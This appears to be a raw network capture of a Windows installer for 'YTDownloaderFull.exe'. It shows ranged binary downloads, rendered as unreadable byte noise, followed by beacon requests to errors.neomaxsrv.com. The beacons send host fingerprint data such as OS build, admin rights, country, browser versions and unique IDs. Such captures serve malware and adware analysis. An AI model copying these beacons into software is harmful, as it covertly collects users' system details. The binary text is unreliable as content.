Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1000000-1249999/7202358
I......IOx).g5wm..}\..3.B.]...!.... ........03...Qb.{\.........E..q...
...=.....WmB2Yn....m ..*D.-.Z.V..#".L..... _.....&.v.$...".a..........
..Rn.U....z.g.2.55........u......Y.kooG|....d...mi...[u'....\.o.I.....
........y|>.........,;......vmH.G..C......[... m..'..)..R..!-&@.|V.
...L.7W........k....Tb.w...,.Qx.T.%....R....L.....3.^....1...e.R.}..U.
y _&?.....u..b._L.o...Za.S..x .K.w..Pn....B..... ....q...<[email protected]....
9R..../,..2.*.Pm^.w...?...^.(yIq............/....^.E........|AV1ku....
..4...W..H.'*..1p.l..Y.x..C.@ K'o...w..P..x.f.%..`S.s~O..s...N>0.c.
...,..xX...%#.8..$W.M.......3....0.'E..V..yE.s.;.O...f.q0.R.H=k...?...
.........]...t....z.G..u....|6.nCc..E..aJ_............X_C,. L....../.Q
...H..i<P.,T%.b.."..j.UNA..\b.q.]...{.m.S..........E.X/...h....o...
.5>...:....x......d...8.....cI....C..".N..(#c}`F.......).9$......Ro
.u..nm^...R./^?..2...}4..&fB[]T~.}F.....-|...1.l.d..3.oP.0.t..M.....n.
..T..9]8.......B...9"....... `...X..T./bk...GQ;.....5.M.?.k...,.O.|HlF
.U.P....jzZ..AL.N.pp =.)..%.G.iB...u.3..MF..*..Q..2E&........\V45&.`N.
.-.0..... ..N|T.2.....X....aj........r.J...TR....GFa[[email protected].. '.SJ
 .......C(o.x.(.3.B.oFB...\..k.i.)@Q...4...5".....=........}h~...!r.u.
.R..B.Y..k..*...`....s.g.znpr.......i....P....J.Y..Rp..j48[.iGS.....k.
.r*......`..d....mb....3#\}.p......._L.7m.L..30.(..qK5..2..{r..e`..!.&
lt;D.*.j.....B.m~P.WM........66k.........................^).P.....%..D
..:..A........j..w...0..?..............V._....Vwg....x..1*.p....8.....
.5k<p.a8.V.".....Ne.O.\.!z...1..:...5.a..R.r......n.[L.h..@..}?<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2000000-2249999/7202358
=..`.F....\.6..L..........8;.....p.........y..s..x.W.,M`-`.sW/.....J.L
c.Na......HL!.Dm.h/.3.g...........A)b...pOw.h......qZB...Z...f.T....(.
....9c..dO..C..@{S."....$L.....$1R..a{[email protected]'....i....4b......Z.!
./......b)@E ?.......i. mYI.mm}r5...q....*H5........^.e..u......^Jx...
..K.Q%.\:7...[.}s...jb..Y..."Q..'-v."l.....m...{@#..H...9f.a...1..LTe&
gt;.....g()_.A:......_<..L....%..u*tH.Cs...7.}u.H-....8.qr..OG....d
N.....y^.4.6.=..'..D.c|.......n.._B..W\.'..)..zP.. .Xr....D..Jee.;. YV
..7.K..vJ.,.f.l{..L.%[email protected]..@,...3...
l........:.....UP#n..x."..<.e..m.O). nRn..4jM..=...Q...N]..p.....H.
.3.E...p..5$|n s.\:.C.A.]V..JR.D.7......?.q .e....i.4.W.Y...c.........
z.....G.tunP... ....T.6..3...... .z......V.x..].Tx.Pz...:t..jf..?.*R&l
t;d'...[6}ocW.yo....u}.NG..0.v.....2...d..Zz^..b[.....y...[......i..$.
y.._I.[.H2..,..I....y.0H.... ....a3.sj**....)Wb.....`...-..g.a.....(..
L%.....>...sD..........0.Z......d\.I.o.yK{..|8..M....j^5.0...Y.tI..
...m<..N.d{.....UL...Y<.... .~.J!.=......'&..NZ0.O^.?.....<.[
..t..x.`^..&.!......xJ}......0.......RW6.f`.u .......k..3u ..]..G.. ..
:|..S.wl.Og..).(G`..y..`g.......y.....E....v..{...*....4r...HB.......i
.%.L...pe.S......{g...b..@:..m..u....K....GCP..|m.....W..... .z.......
....%.....o.V8.u4.o..g....r.....l"yp'..*;[email protected]'.[y....KW
...x/<x^c..... ..H..Az.v..t...;.;[email protected].....\}..w..!........ vr..Gyn
:.S71...e........Yf...V...S..|jP..l]B........mW.#.z...5[.U...LhY}..~..
.......n..=..c2.Gc.54d.....<H[...)T...D.e..r(....../..k.FD.....<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2500000-2749999/7202358
...{|,.[...oA].#.O..?.;.m...|.U.....z..>.M. hgPJ.R..8..,dF4...\#.;=
j...N.........E.......p# .1X..0c..6.y...F&.H\...8.jW.......=Q>...d.
8.O./.>D.k[,0..........B6.'%..C.?...f...4Kb%Rn.|Jz......7._....c...
...S......DY.5.J...../6..g..y\..P..h...$b4...l.......s.T.1../4;.'<_
..l.C..........r.T...*....kt{..?l(..:f.y...%...7.\...........ng....L..
...9..!.M"..pq.`t....<..GW#H5A^...EV...{...S...,.....h.9......3.u..
"VH...8.....-.w...`).y.-.tp0..M/U&v..Y.....A=.K.,.o../.D .u..........(
.........3s..]... ...c.$n.mzw.>..6L".,0.G.?.&.....2.......0W.w....8
.E...;-b?2.iA...G......e.....U.....n..knn,.h...p.B.xL)C.\...J{).?.LN.x
Z*.G..gF.T..t........JVZ8...m....=BPA.>.#.W. W'...y.&o......K...%.s
.....]dr......t<..."....~. X.,;l%.D...9."t[..........H..<:5.=R..
...B..'........'.g.......N.Et.....{_}KV......u.........Xn.....W...U`..
[.......QD......Y...H.=3.Y...8..|.... 6..(%u...*....z|.....)..Y...Rk..
..>o..13.D...7..C.O'.....qO. .........../.Qx...|..5.L.X..>...rvJ
.p.....Ew?....]m...@|8.$..C....`.7....Z...D.?.....d....i.(.Y.*.Y.9...=
..C..H...*.Y..$`XI/v`.D.D.4..V....O......y._5.h.dH............/..b.V..
..)....w........K.#..PX&..".2..u.([email protected]...!.."./{..X
....:.....XO....F.......q.iK..*........)[email protected].'.4PB...Wm
7.......M..;........"....H./..,\Q..Rt..g..N..d...D..@...*0R...v.......
.....\o....L...N.W...)).I..........U-.Q..B...t..Y7.4.x..8.....H.Q...A.
..n-..qE.........!.Y(.Kht...;....m.pl`............t:"m..U.........7y.D
)r..UB..w. r.... X..4....h.*[email protected],qS..3.....u.....aD0.j....<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive



..u.....:..4.9p.6....)(.^*...'......U.RR.-..x'2......d.......W._..B.g~
.|....4...|.....j.....NY......<.DS\.^.z....\......A...v[.Sq_.|.....
.5..UD.g.. .x...=.....q.(.27......1.*T..?*.....?....].........u..W...m
x].e..F..Qp...[e....s.|G.>.....[0..........jR.Z..dx...<n....8e.R
.F.>>.o.A..Fv0~F\.8za.. T.\v.<...... .6.yWFR4...4<2....wM{
.d.@........=.3.ghN.._.z(.lx..=`.l...v......o..d....30o.#......=eG....
..(..........V..7.^c....J./Ay,U.EI..... ...5...*..y..V..{..;8...f..#.Z
...Fp.ag....n.j.y.T......i..o.h........L2..k...@>.Ez..9....Z.....c.
..E9I...h.D.S..l&..v_....u9.C.....Cf...k....u..LD..Z1..G.H.|.\.....]..
U..!... .Bi....K..-m]..$iK.7..>H.$......*..X..........S<Rb..*7.h
-..R....r.........w.V........5c&........|m.. .....D...l....>.Xn.`~.
IT..................E..R3..JYJ-...B.B......E.|..P...B...].w..;..kn.. L
K...%r.ti.qZX...5.Mw(i..5....J..;..K.}..U...rM....M...<.zw4y~..C..s
e..y...>.......%.u..k......r.j.P.a.....R.wN..!.d....}...Q.2...k....
f..z0)w......]..s.R....z.._Dv..J...z.... .l...![<s.....P.6.tdN.|5..
<~..o......./.\.d/w2PS..?_"..n...s2]..1....yu.u.m.~......._;....#J.
...Y.!-V.yy ..*C...F...h.{.....=.T..X.....4U.M?...$[r.1-..y.k.X .....n
........(.z..UiZ.].\.)R.UiV. .-5$..jF..W{n......*.d.T..........2......
i.T.~...[.d..&4.....P&[Y?.....H.|CpS...n.Z......L{.!..<.HkW....s"..
...~.T~X{.]b......>....n,[email protected].....{.T..M.....r.%.q..
.xL.d>.......9...Rp.#@.s.r.1}h....|.M.1'.AR[....o..S.0. ..........3
q.....4...Lf......%*j~Wa>Y..Q"yk.J.U0c.(r.m..x.D0..5B:.g.O.mxM{<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=4500000-4749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:46 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 4500000-4749999/7202358
fT.....A.....J...D...).8\.........b...........r.xzf3ZncN ....1d(......
....M..pg.....{.].~..x.6q..P.1.....Y......J..4LF.6.'....Q...k.Y.q.,J..
.85F.^.........2*pU...%..[6..V!S..".B./..*4H..o..V./.........tQ..x.|..
....mZ..H.s..|Oy{a1......U.......m..Q..*..t.z6......M.~..`...w..V....s
..NM...S...s.R.B[......26. .jie..gE.f..h.:Z..ld.....V.e.g..47...?Y ...
.)....)f.....69......2.2\...d...2....J....Y..B.......px....0.*.>..Y
.....S...Gc..?.8,.....[C...~..kl.nFv........-.. M-d. .......#... ..2.v
he...2<.._..U8S.....?...Y..D..p......i......?...P}I.C...6.}N.....Nh
.]..z.U.q4.......l.{........'...&.....'.......{.Gq....s.....s......m..
_....&.J..%2.j.GI..Y.6...#.C.....G\o8#-...:.......-..Vz. .#...cJ.9..E.
......w.H^......V.......~.d.....M.]..@*.j`%...o..(..........].....8...
...%.F....\..a.e..B ....&.v..b.l...1c.L.l.)w..[x.d^B8...`..P.. >.|.
.$.n.nM.......>..RDWZ.Kgc.........[S............:.[.3.q..uhr/Td....
^..@!q.!..:2...h..\....k.*.zy..@.(b..Jp._.0....t......P]......z..^...M
w R,kD.(e...cU...-....$..s2..m...X;.y0fF.Z7A.v.5...AC..$2g..C.U....K.&
.w3m..;}.....&..Y.. [email protected]....#Q..C.R;Q.....M]........r..v...D
..\/'[email protected]..`....w.........K...L.A\.D......z5.sV...........
.w....b....C..}.9a....J.(.....{K.....p.........%."nK........X...Q.ot..
\..A...-c<.\....>.K..~&o.{......l........fcpNv.J5...b....H.qd.s.
.X#e.aI..J.L....O.I......M.X..zg.LO.}X^$D.....G.....p......;.^....fz..
....Uc..U..fH.j..5l.m.....Z$yb.(w..['_..y]Q(^9...e......rW...~&.G.....
.B......M.z.m4..n.....a.%L.G.....<..7..~...c....q)...6Z.c.dI.,.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5000000-5249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:46 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5000000-5249999/7202358
.S GC*.}.&.\...y..P...P...6....\.......>[email protected].?.4Wn&..|..y
...........f.~.b....G...)[email protected].[....u...RU....
 .S....."..L.l....?.Zm.:4X.#.}....O{v...Y.i....x..#..X.{.}r..8....)...
...}H..O.../....c*..P...r.??.S......M.......|c.'.R../...}.M".k....B...
...q*.SZ.dO?.....VV.U .U..R..d.._....@~.....e..$...>......f]....z.h
P.r$.}...m5.....}|_..{..M...E..........z Lv.r..q~....t...<.6...?...
re....9.......zu-..H....:.qv......).v.E.r..4....,.B*..f.. ...._..@IR..
[email protected]...$.%.....{.r...89......J.
..*o....'.'"y..~f.,....A\&B..L...2t..4*(...#..A..5D2...O...).s...s... 
...O.E.w....... }.).a..M...c...a..^Os.... ..0......g>4..... ..".,..
.9.w..^ ...?.../[email protected]
.}S....>.%.E....~.%......s..l..7 .f.h..y.'...gc..R.x..X]..*.Z...D..
.lg.E#.5.>.y.m..G.!......Q.e..F..\G.... @{...7.Y..v._......./~H..~.
...|.&s.........Y....|.|.......^-......q@. .j....A.......5.2......:.Y.
T.h.}.E.F.>....,..6i.Z...,D>o...=.'..7.{...(.........G........f.
. o.Ii...........p.&..V.3`f.Q.r..v.......0....o..`..`..&.....9.F}.xny.
xw.....l94.......b|.D..o......=..~Z.=!Y..g.K.YY.P_.0$-..W./.W.'fZ.....
....e..#[email protected].*%/@.C....fQ...W.0)y..m_...`p.C...D.V.".....2..s*..
z..&.V.s.....E&..P...8.-.K.....X..^.o.Cm.g....qA2......`.....zSE.w....
.9..Gr.gGHZn1u....x.lm......<....xP........2k.rn....IZf0....].<.
..:$..7........qnb..g.H....V..9.l...D.......\P.^..!..''.;..M1......Y..
.7).l...^.......M.|...gM......d.Ml.{.2{x.......0_i.>.Q........u<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5250000-5499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:46 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5250000-5499999/7202358
..........Z... ...5....#nA\i7A..........n.X.....A.L.....U......Z7...L.
...a.._Y`-.M.<....^.)>...]]@..3Z.......1...\".y]...[...,.=.."...
..A.Ms.!..w..h.J....#T...<.R.v...(#.B)).F.R.RL..........}....C.^..d
;.d./..Q{t...'....`m..........AyG..:...X......... ...K.@&...IR.r.f....
M..~......:d............M}}..O....D.YO.G.*..=..Q..%....^.(.|.J}...A3(.
..K......]i1...G.8.h...:Jh3L......cd.s..K.c........E}..])...8..W.~.#..
.N ...H.......>hcRL.).>..0/y2.*...5.u%...Fg..q.'.*S...f?.`.a..;.
...`g.H.0.R.Z..."...F.........Ag..R...]...o...HX....".....S&...s......
<.E,a..y...-..S..)..)...a.&O..oij#.:....eA.'.A?..}C._...^R..R......
..h.~P.#.............a..A..%S).D..............KC.f.HH..\.J._..E.....N"
n.Q...U...@^..Ew...J06..6.D[....|.....#.-!..<......#...1..Z..N./.is
[email protected];A.d..h=<v.......qujY*.{.!..b..zEl.&...)....od...Wc..._]=.NJ&
lt;A.R.....m.5...f.g. ..m...e...59........A......O.'...<......J.;..
PU..S...5..i.Q._..."...^.......D.?....,..rV..=i.&{.I.....G.......`....
.....N~.H;..bu.O...H....V.].&..?.kU..A.....e...&.."..(...2?....~4K.Rt.
..-.=....p...KS.9.ozS.....n.....5.....}<.;....%@.Qm....D...Z0^7.;,.
.._...e'......"......J.!Er8.1..l...m>..p..X...XX\vW.......8.&....*Q
.........*x.......m..Z................L......5>...N.8...o.h...c.N|.
.-..s.w=D..]_.G/.P..P.9.y....r.;.v...b.V.7.X. Q..6.?s"6.o`..@u...|hI..
...E.R>.j.....X)T.IG......y...KL.>2Z.JUD....[..R.T;p.3(s.\_....z
.v.f.f}....2.y;.b.PG.......L..(.b.....I......,...l.k$i........z.......
@z....R.I..z7..n.....BL.b|....l...H.b. .v.....i......#...{..2.....<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6000000-6249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:47 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 6000000-6249999/7202358
...s.............g..^..s....}.....sC...P...^....E..m.3..9...C>....2
..R..(..a...I]e............6.D().<.TU$3...]3.......&.H...&Y.....P.X
..;.S.c]F.cJ8..]......@..*".. ...n.R'.Df..ZX...:Ku.....:.7 ...c.'.j.xW
bn.y.m.4v..fp.^.D..\.<h$xR9:~..j..s..m~.d..g.4M.}@..;.\..|1...w....
.n..[.....\.OX.:..4.>.:.g..E..!..,q.!.J..o?q..2i..;..W6...E!...N6..
.#..\K...2...zi..]`..0..!.S.o.7q.........{..?.....]ZBd.....L....~-..qS
X.U:.}.R.....b%.Sl.N.2....'x6......U......B.R..:....6l...(.!.U\|je..%.
lz.]E..`..<.j......e.. ./NOf.U....p...KF._=.hO.3..o.....R}}qi.;o.z.
......N..}....P.{.)..].|..?.T.....^....7U..r....~.Je......X. .z.......
XH.P..".........nB..Q.......R..'.......z3"=>...H.... Sd.w.e)/...YB.
........6pb.I.....:b..<...,c1X.D.-n..!G...T..5.5.M........j........
..e...i.oeX.s.H,.l^..0........T...^.,Jg....0W. ........#.Q....Dp.E..O.
...w...d0...8.\...G...z.4..g5...w.....a...;.........V."X.....a-....wh@
.W7.Dx*Z..J....X.e....$...vC.:[email protected]_y.c....,..bE."=..<....P4.... 
..:..o....f..l.....b/.V...F 8..tn.-..Y...".."....sB.I.Z...%x>y..6.D
cR..?.iYbc.CY:...%.q..9....D...."..w..W..p..F.R.j..x..%G.=uo..2...*...
. ...L.D./.fN|..);..l...vkp.`=..._.#O..o..A......zr...Nsb.0ui (E-.<
.G..o\K.dF.]..7g.x..9...P...n[&..1-...i..;..*..V{.$.........Q....E.~.&
...Y.~.)>[email protected].$.^W=..v5~..u...X..n..3...UmO.
......o.<......*\..M..k.G.sU.-...PK.8L..S..]8T=...nmA.\.(Ör."....
3|w...B....F.....)Q*L......d......q.Y.a.........w...n.........n..K.S%.
./...k#..p;...k.aZ.%.G0X.C....R......F.>..$#,..;ny..,.#r4!,t?..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6500000-6749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:47 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 6500000-6749999/7202358
;...gg...\.k.FA...!...|.k.*....F.mq.Q....!x.D..K.W...6...:.....y.i0...
.l..2.N.^...7...f0..x4.%....u...l.../.<[..........bnb.Sf:......2.c&
Y=.h.KD..r...G. .V....PlS.6. ...c...w..$....R....3=H).........!.s.:.I.
6w....A...;]..n.....:/X)<\.F..h......}..R.K(.K4?.......X...fe....nh
R....ZW.O........'.Ww..'r]..r..c...J#.n... [email protected]:0Y...f.....
...C#....:..Oq...h...T.t...3.8..$..M..W.........8.q.pe...F0...k=R..3.C
.\2.P{..HE.k.W.J.....;........'%.f7...@..'.K.......U...%..KV..C*=..}I.
.^c..O.Jv.0..m........M]..Zkg..xZ..O....1]%T..*..{.1..}...=|b.z......u
..c...../[.....@..."(.3#" ..b.l.M....U.......rE.,..i..s:..,...r_.Q`.S.
.6F[~E.....$..m..p.|Q..5.[.R....-u*E.......-...Y.......w.`.$U\. 7..|..
F...O..w...@...=#.~..b..R.M=e.....U..LH.zk. .%...Pf.,5...O.......E..}.
^]....*@?.(.........[:$..1.1L.}.g..hSU.2{~.o..q...........te7e..a...h.
......U.H..\w5`..T...?.$..F6.x. a.. .!Z...E....X..0..h...v.t.Gn.F.."..
$....,.%V/H....o....."GF".!B^..p..#.e[.=...../....3.Z...........[..n..
&.Q...._\.W..r.....*..|.u..6.!.....O...C..:..|..w...b....s..l2...../.o
../..I...*JY...p{:.Z.nc.R.9X..$..J..(D.<.#..q.............4...[>
.|...' ?.zF...I)#.].Q!XyXA(w.,.*,N..."S...f..L_.`.oX..S..3 B..*...Y@E@
......P.....G...G....o. `......pJ.....1...`.7U....N =...0.J..e=.5Dp4.O
.,..0.a./mw.B........Y......e,~P..)|.....&.....gw.`p..a..h......p..HE.
_...qG.&.S].....1.. df.2&x.........bN.%o)..92..../R..W .....-=r..x.).[
...t......c.M.....:.-...j.._...........k.>.....<w.-Y2..F..z...o.
...qx.QM......[. ."A..k....~.......b._..C....2.:..p*Y.5.,V. .}X..?<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6750000-6999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:47 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 6750000-6999999/7202358
^.g9?..~.e..ik....D>....g!..[....G........e:]....m.@d....:n %. .W..
c.....gr.....-......v'..i...x.t.R}j..~......"[email protected].....
t.H........-.3.|zq...M.V...,.U..Y... .P..`....X....U....6...:s...*....
O...2.4.D.........YrF6....4.E..U..Y..N...'...7w.u6.:....P{... .!..9..*
........\..=......n.".Z.A{'Q..V6..| zy.)e.$trS.q0....^.....eE.n.n&!..=
..w...n.g...|P..q.Q.q.Q.....NL."."dV1.N..............s)8el........iS..
P....{......q][email protected]..=w....w:.........'.k.W>.)Z...$...!9C.n.N
}.x.U.......}_..{;...O...l...s17.~.Y.Swv.$...D_..5 .7(..I.f...T....;7.
.J...../..k.T.......u7.t.../o.2.!.......T....zi.=.}Br...j.f..........'
.m.X.N.>{>...,.lY....q<l.l..z.0F{..<m..M.W.R..qP...4..=v.d
......2.....^y.......$d....I....m{T...?V... ...*..kA.[...tv.W.....Dnz:
....j...=..Qp......`..(..P.q.......g)f.`.`.v..H*.wt....E..5cK.3....7..
.7B.{_..'..........[.G..bLc.d6jF.`..;p..fo..3i..=..:.wm./.S....G.=.DF.
....k......N..(Pf.F..N.a..z.t..3.>\..{..vdVu.,. Bl..()m....#wz.....
w.#,j....R..%....K?-...~.....u....*.......gz...........R[..P."q.F}.*5?
Jd...^........HA....t.....R..<N"..........$.r.=......KkogU6l......v
Fk.v.K......!.`.M.=...me.x.3.xS.>.............p.i.....-}...l......g
...^..E...y.g........ !..d....~....Re..KNn...|sF..V..)*....<q&..J.p
....,......=fw......[.P........Z..x..|......."![.9.....,.d(^2{...>G
...o......c.)..&..d./..(..NU.@....>p#.:..0A..... ...d.TW..Vwp.V..(.
.#J(M*.....u.u..(.B.`.Z....l...*4w.......W}.mr......7..x.RV.L....=.C9.
.Q;R....?4..8....0.r."...3...e./.....vq'....Z..X..FQ.......R...;..<<< skipped >>>

GET /utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1434694627 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: a/v/TkCDjDXNOUCx5JggAiQyraiUY1yTlBdYdFsrpWHZ5SuGFrZeUQOF2PgstdWfSXYIm/WwaZ4=

x-amz-request-id: 39E30CAF82615D4C

Date: Fri, 19 Jun 2015 06:17:02 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:15 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: a/v/Tk
CDjDXNOUCx5JggAiQyraiUY1yTlBdYdFsrpWHZ5SuGFrZeUQOF2PgstdWfSXYIm/WwaZ4=
..x-amz-request-id: 39E30CAF82615D4C..Date: Fri, 19 Jun 2015 06:17:02 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Mon, 18 May 2015 15:31:15 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....


GET /installer-error.gif?action=sesamy&app=70881&appver=0&ver=1_36_01_22&version_date=15-06-18&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=0208564D91484BCA9A3852148DE8C91DPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNUd6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGJkNi05N2ZmLWYxNWQyODgwMWMwMiwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRiZDYtOTdmZi1mMTVkMjg4MDFjMDIifX0=&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1434694627&procruntime=5&rnd=1434694632 HTTP/1.1

Host: errors.neomaxsrv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: bqN/bjMMupj8kJk7HyOQfMEAd2r o9xcAqJJDAFeuEJ4VTHWMH8cDNRZ0MJIJXsHt5tYtdqaDWQ=

x-amz-request-id: 7DD3F614509C6E38

Date: Fri, 19 Jun 2015 06:17:07 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 18 May 2015 15:31:10 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: bqN/bj
MMupj8kJk7HyOQfMEAd2r o9xcAqJJDAFeuEJ4VTHWMH8cDNRZ0MJIJXsHt5tYtdqaDWQ=
..x-amz-request-id: 7DD3F614509C6E38..Date: Fri, 19 Jun 2015 06:17:07 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Mon, 18 May 2015 15:31:10 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....

GET /utility.gif?report=fdata&f=1&c=001729&i=200&n=init_end_funnel_step_name&rnd=1434694633 HTTP/1.1

